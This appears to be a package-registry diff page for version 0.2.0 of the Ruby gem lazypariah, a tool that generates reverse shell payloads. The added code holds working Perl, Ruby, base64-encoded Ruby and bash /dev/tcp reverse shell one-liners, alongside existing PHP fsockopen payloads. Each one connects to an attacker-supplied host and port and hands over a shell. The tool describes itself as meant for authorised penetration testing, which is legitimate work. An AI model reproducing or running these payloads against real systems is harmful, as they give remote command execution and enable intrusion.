lazypariah 0.1.1 → 0.2.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of lazypariah might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/lazypariah +21 -3
- metadata +5 -5
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: bd291a993c069eed15490793163c44f1a71ffa52a14a5764c100e67e9fd83387
|
4
|
+
data.tar.gz: '0589412c913bccca3beff307194761fb0e495fdc2b2bb717e8f817587f294874'
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 18ee080a774d2d8606eb52afbc2c8ece30844a42b1dd9717acb55f9f271c81683a465ac2dcdb9fbbd89c8d4868795ea5131ebd631157d6348e46619ed86270d1
|
7
|
+
data.tar.gz: 3ebcd058ab7994a3ed8b59b1b0c4df41779c0b349b143c0eac6913e1e71ad7c878f25d9cbe6f71e7a281b0fce707c108cb05dc66929367ffde2905196bddf060
|
data/bin/lazypariah
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
#!/usr/bin/env ruby
|
2
2
|
#
|
3
3
|
# Title: LAZYPARIAH
|
4
|
-
# Version: 0.
|
4
|
+
# Version: 0.2.0
|
5
5
|
# Description:
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
@@ -27,7 +27,7 @@ require "erb"
|
|
27
27
|
|
28
28
|
# Define constants.
|
29
29
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
30
|
-
PROGRAM_VERSION = "0.
|
30
|
+
PROGRAM_VERSION = "0.2.0".freeze()
|
31
31
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
32
32
|
|
33
33
|
# Define payload list.
|
@@ -53,7 +53,12 @@ PAYLOAD_LIST = [
|
|
53
53
|
"php_fd_4_tags",
|
54
54
|
"php_fd_5_tags",
|
55
55
|
"php_fd_6_tags",
|
56
|
-
"
|
56
|
+
"perl",
|
57
|
+
"perl_c",
|
58
|
+
"ruby",
|
59
|
+
"ruby_c",
|
60
|
+
"ruby_b64",
|
61
|
+
"bash_tcp"
|
57
62
|
].sort()
|
58
63
|
|
59
64
|
# Define function for displaying program information.
|
@@ -184,6 +189,19 @@ begin
|
|
184
189
|
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&5 >&5 2>&5\");?>", url_encode=url_encode)
|
185
190
|
when "php_fd_6_tags"
|
186
191
|
print_output("<?php $sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&6 >&6 2>&6\");?>", url_encode=url_encode)
|
192
|
+
when "perl"
|
193
|
+
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
|
194
|
+
when "perl_c"
|
195
|
+
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
|
196
|
+
when "ruby"
|
197
|
+
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
|
198
|
+
when "ruby_c"
|
199
|
+
print_output("ruby -e 'require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'", url_encode=url_encode)
|
200
|
+
when "ruby_b64"
|
201
|
+
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
202
|
+
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
203
|
+
when "bash_tcp"
|
204
|
+
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
187
205
|
end
|
188
206
|
end
|
189
207
|
end
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: lazypariah
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.
|
4
|
+
version: 0.2.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Peter Funnell
|
8
|
-
autorequire:
|
8
|
+
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2020-11-
|
11
|
+
date: 2020-11-22 00:00:00.000000000 Z
|
12
12
|
dependencies: []
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|
@@ -27,7 +27,7 @@ homepage: https://github.com/octetsplicer/LAZYPARIAH
|
|
27
27
|
licenses:
|
28
28
|
- GPL-3.0+
|
29
29
|
metadata: {}
|
30
|
-
post_install_message:
|
30
|
+
post_install_message:
|
31
31
|
rdoc_options: []
|
32
32
|
require_paths:
|
33
33
|
- lib
|
@@ -44,7 +44,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
44
44
|
requirements:
|
45
45
|
- A GNU/Linux or BSD operating system.
|
46
46
|
rubygems_version: 3.1.2
|
47
|
-
signing_key:
|
47
|
+
signing_key:
|
48
48
|
specification_version: 4
|
49
49
|
summary: A tool for generating reverse shell payloads on the fly.
|
50
50
|
test_files: []
|